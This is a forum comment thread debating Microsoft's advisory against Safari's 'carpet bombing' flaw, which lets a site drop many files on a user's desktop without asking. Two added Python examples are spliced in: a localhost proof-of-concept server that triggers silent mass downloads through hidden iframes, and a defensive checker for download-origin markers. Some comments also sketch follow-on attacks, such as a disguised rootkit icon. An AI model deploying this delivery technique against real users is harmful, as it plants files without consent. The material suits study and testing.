Microsoft Urges Windows Users To Shun Safari
benjymouse writes "The Register has picked up on a recent Microsoft security bulletin which urges Windows users to 'restrict use of Safari as a web browser until an appropriate update is available from Microsoft and/or Apple.' This controversy comes after Apple has officially refused to promise to do anything about the carpet bombing vulnerability in the Safari browser. Essentially, Apple does not see unsolicited downloads of hundreds or even thousands of executable files to users' desktops as being a security problem." Now while downloading a hundred files to your desktop won't automatically execute them, Microsoft's position is that a secondary attack could execute them for you.
"Now while downloading a hundred files to your desktop won't automatically execute them, Microsoft's position is that a secondary attack could execute them for you."
With hundreds of files on your desktop, what are the odds you'd hit one when you are just blanking out a selection, or deleting them, or frustratingly smack your mouse for [whatever reason]
The irony level in this situation is simply astounding. Secondary attack can cause execution of said downloaded binaries? What about all that malicious content that Internet Exploiter happily executes for the user with nary a warning or confirmation?
Time for bed.
Talk about the stove calling the kettle black.
... said the fox to the hen, "Here, come and sleep in _my_ house instead..."
Finally, something we can agree on.
OK, I'm the curious type, so I made a test on my server with the provided example.
Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.
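The delivery mechanism this comment describes, as an added example rather than code from the original post or from Nitesh Dhanjani's proof of concept: one page loads hidden iframes, and each iframe URL is answered with a Content-Type the browser cannot render. A browser that saves unrenderable types without asking writes one file per frame into its download folder. The type blah/blah and the name carpet_bomb.cgi are taken from the comment above; the file count, the basename of the dropped files and the listening port are assumptions, and the bodies are plain text so nothing dropped is executable.

```python
"""Carpet-bomb delivery demo: one page, many auto-saved downloads.

Added example (not Dhanjani's PoC). A browser that saves unrenderable
Content-Types without prompting writes one file per iframe into its
download folder. Bodies are inert text.
"""
import http.server
import threading
import urllib.parse

UNRENDERABLE_TYPE = "blah/blah"     # quoted in the thread; not a registered MIME type
PAYLOAD_PATH = "/carpet_bomb.cgi"   # name used in the thread
DROPPED_BASENAME = "dropped"        # assumption: basename of the saved files
DEFAULT_COUNT = 4                   # assumption: number of files the demo drops


def build_carpet_page(count: int) -> str:
    """Return HTML that loads `count` hidden iframes, each pointing at the payload URL."""
    frames = "\n".join(
        f'<iframe src="{PAYLOAD_PATH}?n={i}" width="1" height="1" '
        f'style="display:none"></iframe>'
        for i in range(count)
    )
    return f"<!doctype html>\n<html><body>\n{frames}\n</body></html>\n"


def payload_response(index: int) -> tuple[dict, bytes]:
    """Headers and body for the index-th dropped file.

    The unknown Content-Type is what triggers the silent save; the
    Content-Disposition filename is what the victim sees on the desktop.
    """
    filename = f"{DROPPED_BASENAME}_{index}.txt"
    headers = {
        "Content-Type": UNRENDERABLE_TYPE,
        "Content-Disposition": f'attachment; filename="{filename}"',
    }
    body = f"harmless file number {index}\n".encode()
    return headers, body


class CarpetHandler(http.server.BaseHTTPRequestHandler):
    count = DEFAULT_COUNT

    def do_GET(self) -> None:
        parsed = urllib.parse.urlparse(self.path)
        if parsed.path == PAYLOAD_PATH:
            try:
                index = int(urllib.parse.parse_qs(parsed.query).get("n", ["0"])[0])
            except ValueError:
                index = 0
            headers, body = payload_response(index)
            self.send_response(200)
            for name, value in headers.items():
                self.send_header(name, value)
        else:
            body = build_carpet_page(self.count).encode()
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):  # keep the demo quiet
        pass


def start_server(count: int = DEFAULT_COUNT, port: int = 0):
    """Serve the demo on 127.0.0.1 from a background thread; return (server, port)."""
    CarpetHandler.count = count
    server = http.server.ThreadingHTTPServer(("127.0.0.1", port), CarpetHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    srv, bound_port = start_server()
    print(f"Open http://127.0.0.1:{bound_port}/ in the browser under test; Ctrl-C to stop.")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        srv.shutdown()
```

Point a browser at the root URL and watch its download folder: a browser that prompts (or refuses) per file is behaving as the later comments expect, one that silently writes `dropped_0.txt` through `dropped_3.txt` has the behaviour Microsoft's advisory is about.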
Not for me? Safari 3.0.4 running on Mac OS X 10.5.2 renders a web page of numerous blank empty boxes. Nothing was placed in any local folder. Is anyone else able to duplicate this?
I work for the Department of Redundancy Department.
So just how does Safari react when you go to Microsoft's update website?
Take Nobody's Word For It.
One other thing that hit me immediately... MS: "Omigod they found a BUG in our competitor's web browser! Because we're very concerned for our users' security, we urge you to stop using that browser immediately! Users should NEVER use a buggy web browser! (unless it's explorer)"
Microsoft is saying that Windows is a very different sort of environment. You can't allow convenience on Windows - it's just not secure enough.
Wow. Have to admit I'm on Microsoft's side here. Let's see:
It's not just the vulnerability that hurts, but the compound bullshit caused by Apple's -- rather arrogant -- actions. This reads like something Microsoft would do!
Also, vulnerabilities in Apple software (and this bug affects both Windows and Mac), make all *nix stuff look bad: watch MS shills roll out the 'Microsoft software is only vulnerable because hackers target it' FUD in short order.
Posting as AC due to Apple fanboy-mods. Modding this down doesn't stop it being the truth.
A list of actual drive-by vulnerabilities in current Internet Explorer (name-calling went out of vogue when you reached the age of 15, man. You are at least 15, right?) that allow for code execution on the client to substantiate your claim, please.*
Now if you want to point fingers, visit that Dhanjani link and read about the vulnerability he's not disclosing, as a courtesy to Apple; "The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system [...] it is a high risk issue affecting Safari on OSX and Windows". There hasn't been an update to that in the past 2 weeks, implying that it has not yet been fixed.
The Slashdot headline is pure flamebait and you took it.
As much as I hate M$ and all it stands for, I agree Safari shouldn't be used. It's bad enough that Apple nags me to install Safari and iTunes on my Windows computer whenever there is a QuickTime Player update.
But how can Safari download the files without user consent (and the fact that asking the user whether to download the file is a feature request :-O)? I haven't seen any other browser behaving like that.
They called me mad, and I called them mad, and damn them, they outvoted me. -Nathaniel Lee
It's not the quality of the links (websites) that matters, it's the quality of what is reported at the destination of the URL. I'll swim through a sewer to get my food if I have to.
What do you have against The Register? Or blogs? If Slashdot themselves use Journals and User Postings, is that not a blog of sorts in the first place?
That guy appears to be the one who discovered the vulnerabilities and reported them to Apple.
Do you really think Slashdot shouldn't link to primary sources?
-Esme
Hi all. I'm in the uncomfortable position of agreeing with Microsoft on this issue. If a browser (any browser) allows a website to randomly download files without the user's explicit permission, regardless of the location, it is a security issue in my opinion. Having said that, I take issue with Microsoft's security advisory. The only thing they say is: "What causes this threat? A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user's machine without prompting, allowing them to be executed." OK, but how about telling us the how or why? Since it is a direct contributor which causes the blended threat, I don't think it's asking too much to want to know exactly "how the Windows desktop handles executables" and how that contributes to the threat.
Supposedly it does this on OS X as well, but a comment above says it's not doing it; that's an aside, though.
If it -does- do this on OS X, then it is called a convenience?
What is the convenience in having a folder automatically stuffed with files, downloaded without your say-so, exactly? Regardless of whether they can then be arbitrarily executed by a second program, or whether the user can execute them without a warning dialog popping up or not, etc. What, in your opinion, is convenient about it?
I find alt+click in Firefox convenient to download a file that I want without clicking on it and then going through the download dialog. I find it even more convenient that Firefox -asks- me if I want to download a given file if some crazy redirect page pointed me to one; gives me the opportunity to say "Hell no!" before the file even ends up on my drive.
But our opinions on convenience may differ.
Microsoft urges users to shun anything that they don't sell.
This is a story?
* Carthago Delenda Est *
This is a reasonable warning that would be applied as-is to any other app. Apple leaving this unpatched is adding fuel to the fire, which started with the QuickTime vulnerabilities and the sudden uptick of Mac vulnerabilities over the last few years, that Apple is no more serious about (or maybe capable of) security than any other company.
/LabMonkey09
Well, let's see:
Oh, I see. So, the auto-download feature doesn't "properly" tag them like IE7 does, so users might accidentally execute a program without being first informed it was downloaded? Gosh. Sounds less like a security vulnerability than MS blowing smoke.
But, wait:
Oh, well now it's sounding more like it'll be downloaded *and* executed automatically. Of course, if that's the case, half the "security vulnerability" is in Windows automatically executing things. If not, MS is simply lying... unless they have proof that Safari is the one causing said automatic execution.
However you spin it, Safari allowing carpet bombing is an annoying feature (much like pop-unders are an annoying feature). But it's not a security vulnerability. Labeling it as such is bullshit.
Does that mean you should use Safari regardless? Personally, I'd say no. Carpet bombing is too annoying of a feature to tolerate. But, then, I'd imagine Windows has too many annoying features for a lot of Mac users. It'd be just as asinine for Apple to issue a security advisory to shun Windows.
Eurohacker European paranoia, gun rights, and h
One hundred rounds does not constitute firepower.
One hit constitutes firepower. (Gen. Merritt Edson, USMC)
If a browser (any browser) allows a website to randomly download files without the user's explicit permission, regardless of the location, it is a security issue in my opinion.
It's a minor issue compared to a number of others that ALL browsers on Windows have. If Microsoft is serious about security then they need to:
1. Immediately transition away from ActiveX, with as short a timeframe as possible.
2. Replace ShellExecute() with something similar to UNIX's exec(). They already HAVE the code, in the POSIX subsystem.
3. Eliminate "security zones" as a security model - there must be no circumstance in which the location of an object named in a web page automatically grants it privileges.
4. Provide an alternate API for browsers to use to find and run helper applications that is not based on the desktop helper application bindings.
All four of these are far bigger problems than having files downloaded without a prompt. Not only do they all provide paths to direct execution of untrusted code without user interaction, but they have all BEEN used for that purpose hundreds of times over the past decade.
I am not sure it's possible to implement a really secure browser on Windows without completely bypassing all of Microsoft's recommended APIs.
Why do MS and Apple put huge amounts of money into developing browsers when Firefox exists? IE and Safari generate zero revenue for the company since they give the software away, so it can't look too good on the balance sheet.
I can only think that it's some kind of NIH syndrome, or content-control-freakery, or that if they suddenly stopped making a browser and said 'oh flip it, Firefox wins' that confidence in the corporation (and hence share price) would nose dive.
Any other ideas?
You can tell Safari to put downloaded files wherever you want.
So they don't have to be on the desktop
"restrict use of Vista as a GUI until an appropriate update is available from Microsoft"
davecb5620@gmail.com
Works fine here.. you might not have had execute permissions set on your server for the cgi file... Here's an active test of the sample code ("Only" downloads 4 harmless files)
http://appleguru.org/webkit_test/
appleguru.org
And the /. users still don't RTFA...
That 'some guy' was the person that discovered the vulnerability and sent it to Apple.
How much more authoritative do you want it w.r.t. the bug in question?
The Register itself may not profile itself as a NYT-level news site, but they do occasionally have good articles.
"I was in love with a beautiful blonde once, dear. She drove me to drink. It's the one thing I am indebted to her for."
On Mac OS X this isn't really a problem - at least not since Leopard. When things download in Safari it's obvious to the user, and only certain file types are considered safe to open right away, so there's no automatic execution of application bundles or .command files. In Leopard, the first time you try to open or execute a download you get a dialog warning you that the file is an internet download. You can choose to open it anyway, or you can choose to view the file's source web page. If the file resides on a disk image, you continue to get the warning every time you open the file until you check the box indicating that the disk image is safe.
-- thinkyhead software and media
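The marker the comment above (Leopard's first-open warning for Internet downloads) and the earlier one about IE7 "properly tagging" downloads are both talking about can be inspected directly. What follows is an added example, not Apple's or Microsoft's code: it parses the Zone.Identifier alternate data stream Windows attaches to downloads and the com.apple.quarantine extended attribute Mac OS X attaches, and reports whether a given file carries either. The sample stream and attribute values in the usage are constructed; the fourth quarantine field varies between OS versions and is treated as opaque.

```python
"""Does a downloaded file carry a 'came from the Internet' marker?

Added example, not Safari's or Windows' code. Windows keeps the marker in an
NTFS alternate data stream named Zone.Identifier (IE7 writes it; the thread
says Safari for Windows did not). Mac OS X keeps it in the com.apple.quarantine
extended attribute, which is what triggers Leopard's first-open warning. The
readers return None where the platform cannot expose the marker; the parsers
are pure and run anywhere.
"""
import os
import sys
from typing import Optional

# URLZONE values stored in Zone.Identifier; 3 (Internet) and 4 trigger the warning.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}


def parse_zone_identifier(text: str) -> Optional[int]:
    """Parse the INI-style body of a Zone.Identifier stream; return ZoneId or None."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "zoneid":
                try:
                    return int(value.strip())
                except ValueError:
                    return None
    return None


def parse_quarantine(value: str) -> dict:
    """Parse a com.apple.quarantine value: 'flags;hex-timestamp;agent[;extra]'."""
    fields = value.split(";")
    if len(fields) < 3:
        raise ValueError(f"malformed quarantine attribute: {value!r}")
    return {
        "flags": int(fields[0], 16),
        "timestamp": int(fields[1], 16),        # seconds since the epoch, in hex
        "agent": fields[2],                     # e.g. 'Safari'
        "extra": ";".join(fields[3:]) or None,  # bundle id / UUID; format varies by OS version
    }


def read_zone_identifier(path: str) -> Optional[int]:
    """Windows only: open the file's Zone.Identifier stream via the path:stream syntax."""
    if os.name != "nt":
        return None
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


def read_quarantine(path: str) -> Optional[dict]:
    """macOS only: read the com.apple.quarantine xattr, if present."""
    if sys.platform != "darwin" or not hasattr(os, "getxattr"):
        return None
    try:
        raw = os.getxattr(path, "com.apple.quarantine")
    except OSError:
        return None
    return parse_quarantine(raw.decode("utf-8", errors="replace"))


def is_marked_from_internet(path: str) -> bool:
    """True if the OS would treat this file as an Internet download."""
    zone = read_zone_identifier(path)
    if zone is not None:
        return zone >= 3
    return read_quarantine(path) is not None


if __name__ == "__main__":
    # Constructed sample values, as an offline demonstration of the parsers.
    print(parse_zone_identifier("[ZoneTransfer]\r\nZoneId=3\r\n"))
    print(parse_quarantine("0081;4847e8c9;Safari;|com.apple.Safari"))
    for p in sys.argv[1:]:
        print(f"{p}: {'marked' if is_marked_from_internet(p) else 'unmarked'}")
```

Run it against a file Safari just dropped on the desktop and against one IE7 saved: a file with no marker on either platform is exactly the case the advisory calls a blended threat, because nothing in the shell will warn before it is opened.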
The reasons are simple:
1) The current version of Internet Explorer (7.0) is actually a pretty decent web browser, and works reasonably well for average users.
2) Firefox 3.0, which should arrive some time in June 2008 in the final version, will get plentiful third-party support and the revised memory management has drastically reduced the memory "footprint" of the browser.
Why bother with another web browser that is not really a viable alternative to IE 7.0 and the upcoming Firefox 3.0?
There, now no one has to worry.
Sorry, could not resist.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
-The Editors
But Safari places them on the desktop by default. This is the key problem, and in fact a good number of security vulnerabilities wouldn't be an issue if it weren't for the fact that the majority of users stick with the default settings.
And you can't make the argument that the only people downloading Safari are power users anymore - if you have an iPod, odds are that Apple Update has pushed Safari to your machine.
If Hitler makes a case that you shouldn't kill jews- it doesn't mean his argument's invalid just because he's Hitler.
Isn't the main reason for Safari being on Windows so that developers can test web pages for iPhone compatibility?
OTOH, there's the whole thing with Apple Update on Windows pushing Safari at you, so that must no longer be true.
Hail Eris, full of mischief...
E pluribus sanguinem
Thanks for the link. Konqueror on GNU/Linux brings up a save file dialog. Safari on OSX does the same. It seems like the problem is not with the browser.
Move along, nothing to see here.
I keep reading comments like "well in OSX blah blah" or "Windows just isn't secure"... OK, that's informative, but it's really beside the point. I'm willing to bet that Apple is not addressing this fix because it's good PR to the uninformed. If the user perceives that it's Windows' fault then they might well go all Mac since they are already using Safari... Anyhow, I think that along with the PR bit, Apple doesn't want to admit that there is a huge gaping hole in their web browser, which raises a question... is Apple ready for a bigger market share? Microsoft may have security holes, but you can almost bet they will be patched in a timely manner. With Apple, from my experience, it takes quite a while for updates to hit the servers. I don't really see this as controversial at all: Apple needs to patch their product, Microsoft has an obligation to protect their users... I would expect Apple to do the same with IE if Microsoft outright REFUSED to patch it. I know there is a lot of Microsoft hate here on Slashdot... but this is pretty obvious in that it's Apple being the "bad guy" here.
Anytime Safari downloads an executable in OS X it pops up a warning dialog informing the user that Safari is downloading a potentially dangerous executable, and then one has to click Cancel or Download in that dialog. So no, it isn't a problem on OS X, just Windows. I wonder why they don't give Win users the same protection?
Caveat Utilitor
On one hand, who gives a shit. On the other hand, Apple has released software that was significantly less user-friendly on Windows for years and years. I've always hated Quicktime. iTunes is a stupid beast. I don't see why it wouldn't be the same with Safari on Windows.
Now I'm on a Mac, and all that shit works just fine (though I'm switching to Songbird as soon as it's stable enough for me). But it is curious that Apple pretends that a problem with something they designed for Windows is no thing at all.
I can't shake the image of the Mac and PC guys involved in an epic sword fight. Of the gay variety.
Please stop stalking me, bro.
I think that you were projecting your own limited assumptions about how this would be handled onto me. Actually, what I had (vaguely) in mind was a message that appears unobtrusively; either at the top of the screen (a la popup-blockers), or a new pseudo-page that contains the link. If the user *really* wants the file, it's easy to download it, but it doesn't get in the way when they don't. If a dialog box comes up, people do not read it, and they automatically try to cancel. I think a better solution [..] if some script decides to dump a hundred little files in there, it's OK, or at least better than filling your desktop. No, that's only slightly less bad than the current situation. It still gives some remote computer the ability to fill your hard drive with crap and (as others suggested) leave that open for another exploited vulnerability to execute. There's no point in automatically downloading such files in the first place, since in the majority of cases, people wouldn't have wanted that anyway.
Probably hasn't been larted enough, guv'nor ... give me a minute to charge up the "insulation tester."
http://www.theregister.co.uk/odds/bofh/
Feel free to start listing them now. I'll let you know how many of them still work.
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
Some drink at the fountain of knowledge. Others just gargle.
IE on Vista runs in a sandbox, which no other browser on any OS does. So can you tell us about one, just one disclosed known vulnerability that lets IE (patched with the latest Windows updates) execute malicious content without warning? Or are you full of hot air? PS: (I use Opera)
This space for rent.
It certainly opens the possibility for some "fun" denial of service attacks. How many files do you need on your desktop before explorer.exe croaks? I presume the number is well under 100,000?
Entranced by anime since late summer 2001 and loving it ^_^
Alright twitter, I won't call you names. Just give me one, just one link that can exploit a vulnerability in a fully patched IE 7 on Vista. Or are you just going to continue ranting about exploits in DOS 6.22 as well?
In related news, Microsoft warns against allowing employees using Windows to eat cheeseburgers. The user could become fixated upon the tasty pickle and hackers could sneak into the workplace and steal data from your computer.
From the linked article "Apple does not feel this is a issue they want to tackle at this time. In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion: ...the ability to have a preference to "Ask me before downloading anything" is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.
[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue]."
Shun the nonbeliever! Shun! Shuuuuuuuuuunnnnnnnaaaa...
You are forgetting that if you hit upon a site that plasters your desktop with icons you'll be busy for quite a while cleaning up the mess. Remember tar bombs? The possibility of your disk space running out and the desktop having to render millions of icons is a bit disquieting too, especially on low-end systems.
...during periods when security bugs have been exposed in Internet Explorer. I guess the Ballmer Doctrine is that problematic MS products must be endured while non-MS products should be jettisoned at the first sign of problems.
I don't know why corporations bother, but having used Firefox and Safari (and IE, and Konqueror on Linux, and even Lynx) I must say that I'm glad that browsers other than Firefox exist. Firefox is extremely slow to start up, hogs memory like crazy, is clunky to use, is slow when browsing and doesn't have as good a JavaScript debugger as Safari. On the other hand, Firefox scrolls more smoothly. But still, on the whole I prefer Safari over Firefox. Of course both applications have a major flaw: they refuse to work with the system theme. Contrast this with Konqueror, which is almost identical to Safari in many ways, but does look like all other apps. Just waiting for the Windows version to become stable enough to use it as my main browser.
Teacher, may I go to the bathroom?
What if Apple's security team had said no?
Oh I'm sure they see the problem. For Microsoft. First they spam the bundled download of safari and then ms windows looks less secure? Tell me, why would they hurry and fix it?
Why should Apple fix a vulnerability in their browser that only affects Windows if it only makes their for-profit hardware division look better?
By not fixing this, they can say "Oh look, another Windows vulnerability," and people won't look too closely and realize that it's actually something Apple themselves could fix.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Every patch tuesday, M$ publishes a small fraction of current exploits. It's amazing that anyone could be modded insightful for saying that IE on Windoze has no current security holes in an article about M$ security failing.
Something that also affects OSX...
I read that as saying that the suggestion is not being treated as a security issue, but an interface issue.
That doesn't mean that the original issue is not being treated as a security issue. I would suspect that the exploit itself is considered a security issue, and a real fix (not a UI change) will be issued.
According to Aviv Raff, the security researcher who reported this to Microsoft, the Safari vulnerability is combined with an old Internet Explorer vulnerability.
I had this experience with Safari in OS X 10.5.3: I went to a web site, forget which one, and got injected. I could tell monkey business was going on. My downloads folder started to dance, and I went to it just as an .exe plopped into it. Hmm. A danger if I was on my Intel computer, running Parallels, since double-clicking on the exe would have launched Windows, and then run the exe and screwed up that virtual machine. So I'd have to go back to the snapshot I made when I made the installation, and trash the virtual machine that got hacked.
But I was on the G5, so it was like getting a marriage proposal from a Venusian.
It's so nice, getting security lectures from Microsoft.
...That the company (Microsoft) that universally denies, downplays, delays and diddles (sorry, needed another "d" word) regarding every-single-one of their OWN security vulnerabilities (even when they DO allow immediate execution of arbitrary code), has, IN LESS THAN 24 HOURS taken it upon themselves to suddenly act like the world's security cop?
You'd think it was a DRM backdoor in Windows we were talking about!
Now how about the same response time on the 10^7 security holes in every version of Windows, even up through Vista?
... after trying Safari out for about 15 minutes when it was first released for Windows, I advise Windows users to shun Safari simply because it's completely shit, like the rest of Apple's Windows software.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
I finally figured it out! I think they spend all their time on Slashdot modding anti-Apple posts as offtopic.
Yeah their job is to ensure all apple software for windows sucks enough that only mac users would want to use them.
That's a stretch. If Apple continues their bad programming on the PC side, they'll have a hard time convincing people to switch to Apple. I've heard from at least a dozen people that iTunes sucks and QuickTime is evil, and if those basic things suck so badly, why would they want to switch to a Mac? Granted, Mac products on a Mac are pretty sweet, but Mac apps on the PC are pretty awful... EVEN when I find most apps on a PC pretty awful, Apple REALLY stinks them up (as if they just make them as an afterthought, which is very un-Apple).
What if I write a browser for OS X that doesn't mark the file as dangerous? I bet Finder will execute it with nary a warning.
Nothing gets executed on Unix unless the user or a program sets the execute bit. Microsoft does its own thing, which everyone told them was wrong and which has proved inadequate. The first mechanism was none, so anything with ".exe" at the end would run as root. Now they have some other "internet" bit and a UAC which they admit was designed to annoy their customers. The root cause is that the OS itself does not have a sane method of determining what can be executed.
I have little faith in The Register's reporting because they don't seem to have tried it for themselves. Konqueror does not download things without asking the user, and the GP claims the same. You would think that Register staff would have tested this for themselves when they ran the last article and got that comment about warning messages. The whole thing is half-baked Microsoft FUD passed off as news.
So I was using that IE thing and it went like: "whassup with this file?", you know, like my Mother! Then I tried this cool safari thing and it went like "Whoosh!" and then I clicked and clicked and clicked and now I'm like wondering where my essay went, oh no!
This really is rather disingenuous: while Safari on OSX will allow mass downloads, the files won't litter your desktop and executables won't be launched automatically, making this problem little more than a possible annoyance. Even if by some miracle an executable was launched automatically, OSX issues a prompt the first time an untrusted application is launched.
Honestly I would have thought that UAC in Vista would do the same type of thing, preventing this from becoming a security issue.
Cleaning up from a mass download is incredibly easy. Any reasonably computer literate person should be able to remove these files easily (even if they number in the millions) with a single command from the finder, from the terminal or from automator.
Windows users should be able to clean up just as easily from the command line, so seriously, what's the big issue here? Microsoft's comments reek of anti-competitive bullshit.
Thank you,
From the cult of the open mind.
Odder is one of Twitter's new sockpuppets.
Heh, obligatory link to Get Firefox :)
It can really be a serious vulnerability. Most default Windows setups hide the .exe of executable filenames; with this I could easily place a bogus "My Computer" icon that executes my favorite rootkit.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
and I download to my desktop. You're hereby banished to notcoolville.
I use OSX occasionally and don't have a problem with Apple apps running on Apple's OS. Apple apps running on Windows are another matter entirely. From the earliest versions of QuickTime for Windows (why do you think there's QuickTime Alternative?) to the latest version of Safari, I have yet to see one piece of Apple-authored Windows software that doesn't make me want to gouge out my eyeballs with a spork. Don't even get me started on iTunes! It isn't just Apple's complete unwillingness to bend the Apple way of doing things to accommodate the standards of other OSes. Their Windows software is just plain bug-riddled crap.
Is Apple really just incompetent at writing apps for other OSes? They've been doing it long enough that they really ought to be able to do a decent job by now. Instead, I think Apple is trying to make sure that Apple users who migrate to Windows and install a familiar Apple app will be scared back into the fold.
That being said, I don't use Safari even when I am using OSX. Firefox may not be the perfect browser, but at least they have decent versions available for OSX, Windows, and Linux. That's something that can't be said for IE or Safari. It's nice to be able to stick to one browser across every OS I use.
i have a mac and barely use safari. firefox is the best browser, in my opinion. Christian Loriau
I guarantee you someone at Microsoft had to bake cupcakes when they found out they could justifiably classify an Apple product as a security risk.
What makes this controversial? It's a company saying their product is better than somebody else's. It happens all the time and the only reason this story made it onto /. in the first place is because somebody at Microsoft said it.
You know who else is constantly claiming their product to be superior? Linux users. It might be true, and I'm not criticizing anybody for it, but if a product claiming to be better than another makes it a bad product, then that would make Linux one and you're going to have to stop using it. If that's the criteria, you're going to be running out of things to use really, really quickly, because everybody does it.
2/10. Try harder.
You have to know the rules to be able to break them.
When a download starts in Safari the 'Downloads' window appears. If you want to prevent a download all you have to do is click. This would be impractical with a hundred downloads, but so would a hundred prompts. Likewise, approving downloads one at a time isn't ideal when you want to download a lot of files. I'd like to see Apple add a delay before the download starts to give users more time to respond. A cancel/prevent-all button would also be fun. In the end all Apple really needs to do is change the default download location and this problem becomes a non-issue. Microsoft's claims seem to center around the fact that the files end up on the desktop. All in all I think this is rather ridiculous in the light that the user is made well aware of the downloads and can easily stop them. This certainly won't stop me from using Safari or WebKit in general on Windows. On a side note, there are a number of download managers that take over from Safari's 'Downloads' window on OSX. It's not unreasonable to think this could prevent mass downloads.
If I'm downloading stuff to my Desktop then there is no security problem. Now, uploads are a different matter. Is that what is supposed to be meant here? Me thinks "downloads" doesn't mean what they think it means.
this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
Considering that link says that it's security flaws that have already been fixed that are being targeted, I don't see how that fits what I was asking you for.
As such, Twitter, I'm still waiting. Have to say, kudos for having the balls to reply to me with the username that you copied from mine. I like how you post at -1 with it - that plan really backfired for you, huh?
Well, not quite. It might effect greater sales of Macs, which in turn would effect greater Mac OS X usage...
:P
Couldn't resist. Learn to spell next time...?
Oh, you sooooo need to see Cats (and other animals) and Racks!
Apple is just proving how stupid they really are. At all times a software company needs to see the issue from the eyes of their customers. Going to a web site that can turn your desktop into crap without you actively allowing it would most definitely be considered a security problem by any sane user.
However this clearly *is* a security problem. What if I was on Linux and the file uploaded was .bashrc or .profile or any number of old-school ini files Windows still actively looks for and parses?
The possibility of an attack vector against god knows what preview/display hooks in the OS is only dwarfed by the possibility of execution by an unsuspecting user who assumes programs labeled 'MS Word' appearing on his computer's desktop are safe to run.
That Apple would even bother posting such a ridiculous response only proves they don't deserve to be taken seriously. The good ole days of 'Apple is more secure because no one uses it' are gone forever.
I know some may be embarrassed that I am revealing this crippling exploit, but I just think that it cannot be covered up any longer. I was astonished to discover, after running many, many tests in my parents' basem... secret lab... that all browsers have this horrible bug. Clicking on any link will cause dozens of files to be downloaded automatically!!! That's right: any link you visit on the Web actually causes a complete download of its content to your computer! Think of the unwitting copyright violations! Think of the children! What's worse, these files are not in an obvious location such as your desktop. No, they are stashed away in such cryptic locations as "~/.mozilla/firefox/znf60w9b.default/Cache".
Let's analyze these components one by one.
The tilde ~ is an unusual character - many people do not even know its name, so it is difficult for tech support to help you with this over the phone!
The next part - .mozilla - is doubly insidious. Any file beginning with '.' is HIDDEN from view; you don't even need to set an extended attribute on it, most utilities are actually TRAINED to hide these files. Many of them have the ability to control all of your softwares! Secondly, 'mozilla' must be a reference to some sort of ancient mythical beast. Perhaps the virus writers are religious and do not wish to invoke the name of G-d, so instead they call him by the epithet "Moz."
The next component is obviously gibberish with a seemingly innocent '.default' tacked on for respectability!
And then "Cache" - what is this? Some misspelling of the word "cash?" As in, they want our money as ransom to fix these crippling bugs?
Nay, I say, we must rise up! Rebel against these secretive 'hackers' before they can control our desktop!
Interesting comment here: I didn't bother contacting Apple, as they've told Nitesh that they consider this as an "enhancement request" and will not bother to fix this issue any time soon.
Aviv's smart enough to find an IE exploit to target, but he's not smart enough to understand that because a company doesn't care about a really ineffective denial of service that doesn't mean they don't care about a real problem.
I think you'll find that, if windows does indeed have this feature now, it was copied from OS X.
On my Windows Vista system, I was using Firefox to log in to one Gmail account and Safari to log in to another. It seemed to work fine, except the sound to the external headphone jack on my Acer laptop kept disappearing. It's a known "feature" on Acer laptops. To get it back, you put the laptop into sleep mode....leave it for at least 5 minutes...then touch a key to bring it back...and sound resumes. But using Safari sees me have to do this every time I use the laptop. Not using Safari means I may have to do it once every couple of months. Since I stopped using Safari a couple of weeks ago, I have not lost sound to my headphone jack. I had come to the conclusion Safari wasn't as good as Firefox. But it is better than MS IE. To me, IE is unfriendly.
Only boring people are ever bored.
XMLHttpRequest was added to IE as a semi-hidden, non-standard "feature." Why? So Microsoft could create a version of Outlook Web Access that acted just like the Windows client--a strong selling point for a product that makes them lots of money.
Browsers render standard Web pages, but they also render the front ends of proprietary server-based apps. It is in a business's best interest to make sure that browsers do what they want them to. Microsoft and Apple do it by developing and distributing their own browsers. Google and Yahoo do it by supporting Firefox.
Adobe does it by creating plug-ins, which is actually a pretty good metaphor for the browser in the OS. Safari for Windows is a "plug-in" on the Windows OS that provides a proprietary environment for Apple's next-gen network apps.
Build a man a fire, he's warm for one night. Set him on fire, and he's warm for the rest of his life.
lol, fine... "Something that affects Safari users on OSX"
Unfortunately the POSIX subsystem's exec call just pastes the argv back together with spaces and passes it to the next program (it has to, it runs through the normal Windows API at some point), so this solves nothing on Windows.
I do agree that having the programs do the quoting and splitting is a big security hole. And I hate to admit it (because it makes it a pain to do some command lines on Unix, and I have often said it's something Windows did right), but the globbing being done by the calling program is also a good security idea: some stupid browser could perhaps be convinced to run "rm" with the file named by the web page, and it sent "*".
